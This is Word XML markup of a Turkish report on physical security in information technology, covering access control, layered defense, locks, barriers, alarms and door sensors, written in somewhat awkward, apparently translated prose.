          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Kısaltmalar </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BT    Bilgisayar Teknikeri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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lastRenderedPageBreak/>
        <w:t>ISO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Uluslararası Standartlar Teşkilâtı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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t>COBIT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bilgi ve İlgili Teknolojiler İçin Kontrol Hedefleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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t>PCI DSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Payment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Card</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Industry Data Security Standardı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>BDDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bankacılık Düzenleme ve Denetleme Kurumu</w:t>
      </w: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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BC393C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="157" w:name="_Toc9949859"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>1. GİRİŞ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157"/>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BT güvenlik uygulayıcısının işinin her yönü, tanımlama, uygulama vebilgiye erişimin izlenmesidir. Burada fiziksel erişim de bulunur. Ne zaman, ne kadar gibi kavramlar. BT güvenlik uzmanının olması gereken kavramlardır.BT güvenlik uzmanının uzman olması gerekmez, başka biri bu rolü yerine getirir ancak etki, politika, stratejiler kavramlarını ve fiziksel korumanın sınırlarını ve faydalarını da dikkate almalıdır.Temelde, katmanlı, çok disiplinli bir yaklaşım sağlayabilir. Kontrollü erişim güvenliktir.</w:t>
      </w:r>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Çoğu bilgi güvenliği uygulayıcısı, bilgisayarın ve</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 xml:space="preserve">telekomünikasyon güvenliği, fiziksel güvenliği başka bir departmana bırakır. </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 xml:space="preserve">Fiziksel erişim kontrolleri ve bilgi işlem kaynaklarının korunma önlemleri, çevrelenmiş bir güvenlik programının temel bileşenleridir. Ancak, tüm tesisin korunması refah için daha da önemlidir. Örneğin; İşyerinde çalışanların ve ziyaretçilerin. Ayrıca, çalışma saatleri sırasında veya sonrasında tesisdeğerli veriler genellikle katılımsız bırakılan makineleri kullanarakmasaüstü uygulamalara erişim sağlanabilir. Tümüne ücretsiz erişimrakipler veya </w:t>
      </w:r>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sanayi yapan insanlar için muazzam bir varlık olacaktır. Ayrıca şirkete zarar vermek isteyen hoşnutsuz çalışanların veya ortakların da büyük bir riski vardı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11 Eylül 2001’de Dünya Ticaret Merkezi’ne yapılan saldırıda da gösterildiği gibifark ettiğimizden daha büyük tehlikeler var. Dış tehlikeler, önceden düşünülenden daha muhtemel görünüyo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Tesislere fiziksel erişim, ziyaretçiler üzerinde kontrol eksikliği ve tespit önlemlerinin eksikliği gibi eksikliklerden kaynaklanır. Böylece işyerleri ve çalışanlarımız tehlikededir. Ek olarak, şirketlerin küçülmesine neden olan ekonomik yavaşlamala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Yerinden edilmiş çalışanlardan istihdam kaybına üzülebilecek riskler yaratabili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Fiziksel güvenlik, değerli bilgileri korumak için her zamankinden daha önemli ve daha değerlidi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Akılcı maliyete karşı varlıkların değeri, çevrede algılanan tehditler gibi çeşitli faktörler ve daha önce uygulanmış olan koruyucu önlemler uygulanmalı ve fiziksel güvenlik planı geliştirilmelidir. Başarılı olmak için yönetimin yanı sıra çalışanlara da dikkat edilmeli onlar tarafından da güvenlik geliştirilmelidir. Ayrıca yapılan güvenlik uygulamaları ve çalışmalarıkuruluşun işini desteklemek içinperiyodik olarak gözden geçirilmeli ve denetlenmelidir. Eksikler varsa giderilmeli geliştirilmeli ve güncellenmelidir.</w:t>
      </w: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tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BC393C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="158" w:name="_Toc9949860"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>2.FİZİKSEL GÜVENLİK (Physical Security)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="158"/>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İşyerine yetkisiz erişimlerin engellenmesi ve bilgi varlıklarının hırsızlığa veya tehlikeye karşı korunmasıdır.</w:t>
      </w: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Örneğin, bina etrafına yüksek duvarlar ya da demirler yapılması, bina girişinde özel güvenlik ekiplerinin bulundurulması, önemli verilerin tutulduğu odaların kilitlenmesiya da bu odalara şifreli güvenlik sistemleri ile girilmesi gibi önlemler kullanılmaktadı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1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name="_Toc9949861"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.GÜVENLİK: KONTROLLÜ ERİŞİM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Erişim kontrolü, bir kaynağa erişimin ve o kaynağın kullanımının kişilere yetkiler vererek ve kısıtlamalar getirerek sınırlanmasıdır. Örnek olarak, hassas bilgiler içeren kurumsal programlara erişimlerin uygun şekilde düzenlenmesi ve kullanıcıların uymaya zorlanması, veri tabanı ve sistem yönetim araçlarına ilgili BS personeli dışında erişimin engellenmesi ve sistem odasına sadece yetkili personelin girebilmesi verilebilir.Bilgi güvenliğinin sağlanmasında yüksek derecede önem taşıyan erişim kontrolleri, uluslararası standartlar ve yerel düzenlemelerde yoğun şekilde referanslanmaktadır. Erişim kontrollerine ilişkin maddeler içeren dokümanlardan bazıları aşağıda listelenmiştir.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ISO 27002 Bilgi Güvenliği Yönetimi için Uygulama Prensipleri Standardı dokümanında 7 başlık altında 25 kontrol hedefi,                                                                               − COBIT 4.1 dokümanında 3 ana başlık altında 7 kontrol hedefi,                                         − PCI DSS dokümanının 12 gerekliliğinden 3 tanesi,                                                             − BDDK Bankalarda Bilgi Sistemleri Yönetiminde Esas Alınacak İlkelere İlişkin Tebliğ’de 3 madde,                                                                                                                                                                                         − Ülkemizde pek çok kurumun uyum gerekliliği olan Sarbanes-Oxley yasasının 404. bölümü.</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BC393C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="160" w:name="_Toc9949862"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.KATMANLI  SAVUNMA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="160"/>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Katmanlı bir savunma, bir miktar fazlalık sağlayarak ve genişleterek erişim kontrollerine duyulan güveni arttırır. Fiziksel güvenlik için katmanlı bir savunma planlamanın detayları bu bölümün kapsamı dışındadır ve deneyimli bir fiziksel güvenlik uygulayıcısı tarafından ele alınmalıdır. Ancak, BT güvenlik uzmanı katmanlı bir savunmanın faydalarını, sağlayacağı ve sağlamayacağı güvenliği değerlendirebilmelidir. Katmanlı bir savunmayı planlayan kişi, üç temel ilkeye ayırır: genişlik, derinlik ve caydırıcılık.</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Genişlik kullanılır, çünkü tek bir kontrol türü nadirenaçıkların hepsini ortadan kaldırır. Bunu ilk olarak tanıdık BT dünyasında ilişkilendirip, birinin verilere okuma erişimini kontrol etmeye karar verdiğini varsayalım. (Oturum açma şifresi kullanarak). Oturum açma şifresi, verileri veri yoluna gönderirse koruma sağlamaz. Bu nedenle farklı bir kontrol türü (yani şifreleme) ihtiyaç duyulan ek kapsamı sağlayacaktır. Fiziksel güvenlik aynı şekilde çalışır. Örneğin, bir kişinin bekleme modunda iken erişimini kontrol etmesi gerektiğini varsayalım. Tesis, bir ön kapıya, arka kapıya, büyük bir garaj kapısına ve açılmayan sabit pencerelere sahiptir. Kapılardaki kilitler içeriye doğru bir yol tipini kontrol eder ancak kırılabilir camlar için koruma yok.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İkinci ilke, derinlik, genellikle göz ardı edilir, ancak çoğu zaman bir katman için en önemli özelliktir. Güvenlik konusunda gerçekçi olmak için, birinin başarısızlığa inanması gerekir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80CA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Herhangi bir kontrol mükemmel değildir veer ya da geç başarısız olur. Böylece, derinlik için, bir geri döndürücü ölçü olarak ek erişim kontrollerinin katmanları eklenir.Temelde, tek duvar, arka arkaya birkaç duvar haline gelir. Tanıdık bir zeminde göstermek için, kullanıcı şifresine bir göz atılır. Parola sonsuza dek gizli kalmaz, genellikle tek bir gün için olmaz, çünkükullanıcıların bunları yazma veya paylaşma alışkanlığı vardır.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Fiziksel güvenlik için derinlik genellikle dış çevreden, nesnelerden uzakta olan alanlardan çalış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Korunacak nesnenin yakınındaki orta alana Teoride, her erişim kontrolü katmanı bi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merkeze doğru eş merkezli halka (çok az sayıda tesis tamamen yuvarlak olmasına rağmen). Katmanlar genellikle tanımlanırgerekçesiyle, binanın giriş ve dış cephelerinde, binanın katlarında, ofis odalarının,bireysel ofis ve dosya dolapları veya kasala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Caydırıcılık, üçüncü ilke, maliyet veya fizibilitesinin yeterli olduğu kontrolleri koymaktır. Yakalanmadan onları yenmektir.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61" w:name="_Toc9949863"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>5.FİZİKSEL GÜVENLİK TEKNOLOJİSİ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161"/>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62" w:name="_Toc9949864"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.1.Güvenlik bileşenleri</w:t>
      </w:r>
      <w:bookmarkEnd w:id="162"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BC393C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="_Toc9949865"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>5.1.1.Kilitler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="163"/>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Fiziksel güvenlik kontrolleri büyük ölçüde kilitlerden oluşur (profesyoneller tarafından kilitleme aygıtı olarak adlandırılır).İşlev açısından, günlük erişim kilitleri, mesai sonrası kilitler ve acil çıkış kilitleri vardır. Yetkili kişiler için gün kilitleri izin verir; kolay erişim - tuş takımı veya kart kaydırma gibi. Mesai sonrası kilitlerin kullanım amacı yoktursık sık açılıp kapanabilir ve çoğu zaman daha önemlidir. Örneğin; anahtar kilitleri, kilitli sürgü kilitleri,asma kilitler, kombinasyon asma kilitler veya yüksek güvenlikli şifreli kilitlerin kasalarda veya kasa kapılarında görüldüğü gibi.</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cil durum çıkış kilitleri bir yöne (yani, ateşten uzak) kolay erişime izin veri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Ortak bir örnek, kamu tesislerinde acil durum çıkışlarında görülen “itme” veya "çarpma" çubuk tarzıdır.Sadece dışarı çıkmak için çubuğu itin, ancak bir geri almak için bir anahtar gerekiyor.Çeşitlere göre, kilitler mekanik veya elektrik olabilir. Mekanik bir kilit, elektrik gücü gerektirmez. Bir elektrikli kilit taşımak için elektrik gerektirir. Kilitleme mekanizması, genellikle solenoid denilen bir bileşen ilebir şaftın etrafındaki bir tel bobinden oluşur.Şaft, elektrik akımı bobinden akarken içeri veya dışarı hareket eder. Başka bir elektrikli kilit türü isebir kapıyı kapalı tutmak için büyük elektromıknatıs. Avantaj, kayda değer tutuş gücüne sahip </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80CA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>az sayıda hareketli parçadır. Her gün insanların kendilerini kilitleme kimliklerini doğrulama (bir BT terimi kullanmak için) daha karmaşık hale geliyor. Geleneksel olarak, insanlar anahtar veya mekanik bir kombinasyon kullandılar. Şimdi şifreli kilitler va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Dahili mikroişlemcileri ve devreleri çalıştırmak için kadranı döndürdüğü zaman elektrik üreten. Ayrıca insanları tanımlamak için elektronik tuş takımları, bilgisayarlar, biyometri ve kart tuşları... Bu daha fazla olmasına rağmen</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T güvenlik uzmanına tanıdık bölge, hepsi bir kilitleme cihazını aktive etmekle kaynaşıyor. Toplu olarak, kapı kilitleme cihazlarıyla birleştirilmiş kimlik doğrulama, “kapı kontrol sistemi” olarak adlandırıl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3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="164" w:name="_Toc9949866"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>5.1.2.Bariyerler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="164"/>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ariyerler; duvarları, çitleri, kapıları, direkleri ve kapıları içerir. Engellerin tasarımına şaşırtıcı miktarda teknoloji ve düşünce var. Engellerin arkasındaki fizik, bomba patlamaları, yangına dayanıklılık hesaplamaları içerebili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3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="_Toc9949867"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>5.1.3.Alarm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="165"/>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ariyerler ve onları doğrudan sabitleyen kilitler erişimi doğrudan kontrol eder. Alarmlar öncelikle bize bunu bildirmek için konumlandırılır. Alarmlar bize ne zaman bir eylem yapılması gerektiğini söyle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larm zili polis departmanını arama gibi bir şeydir. Birkaç kontrolü izleyen bir tesis</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rimlere “merkezi izleme” tesisi denir.Sensörler genellikle çevresel koşulları veya izinsiz girişleri algılar. Çevre koşullarısıcaklık, nem ve titreşimi içerir. Sıcaklık yalnızca yangına karşı koruma sağlamakla kalmaz, aynı zamanda bizi de uyarabili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Klima bir sunucu odasında başarısız oluyor. Nem, yağmurlar veya kırık su tesisatı nedeniyle su baskınlarını gösterebilir.Titreşimsensörleri hem çevresel sensörlerde, hem de hassas donanımı korumak için ve izinsiz girişlerde kullanıl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cam kırılma algılayıcıları veya tırmanmayı tespit etmek için çitler üzerinde bulunan dedektörler. Diğer izinsiz giriş sensörleri bir odadaki ısı veya ultrasonik ses değişikliklerini ölçerek hareketi ve insanı algılar. Aslında, birçok saldırı sensörü</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gerçekten sadece insan etkinliği için yapılandırılmış çevresel sensörler. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BC393C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80CA5">
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:bookmarkStart w:id="166" w:name="_Toc9949868"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>5.1.4.Kapılar</w:t>
      </w:r>
      <w:bookmarkEnd w:id="166"/>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Genellikle manyetik anahtarlarla izlenir. Kapıya bir mıknatıs monte edilmiştir ve bir anahtar yapılmıştır. İnce metal şeritlerin kapı çerçevesine monte edilir. Kapı kapandığında, mıknatıs metal şeritleri çeker kapalı, bir devrenin tamamlanmasıdır. (veya bir devreyi kırmak için onları açık iter). Bir alanın çevresi, bir kişi onlardan geçer. Üstünden geçen insanları tespit eden toprağa kablolar gömülebilir. Hayvanlar bu çevre sensörleri için yanlış tespit kaynağıdır. Birçok alarm sisteminin önemli bir özelliği, sensörlerin kontrol cihazıyla nasıl iletişim kurduğudur - kablosuz veya kablolu-. Kablosuz sistemler genellikle kurulumu daha ucuzdur, ancak radyo frekansı girişimine maruz kalabilir veya kasıtlı sıkışma. Kablolu sistemlerin kurulması pahalı veya pratik olabilir ancak oldukça güvenli bir şekilde yapılabilir, özellikle teller boru içindeyse. Kablolu veya kablosuz olsun, daha iyi sistemler bazı denetleyicinin sistemin bütünlüğünü izleme yöntemi. Sensörlerdeki bilgileri dikkate almayın. Böyle hayati bir işlev ile, bir kişinin kimlik doğrulamasının bazı yolları olmalı Kişinin alarm sistemini kapatma yetkisi. Önceki bölümdeki kilitler gibi, yöntemler Bunu yapmak temelde şifrelerden, herhangi bir bilgi sistemine kimlik doğrulaması yapmakla aynıdır. Akıllı kartlara biyometriye, aynı artı ve eksilere sahip.</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67" w:name="_Toc9949869"/>
      <w:r w:rsidRPr="00BC393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
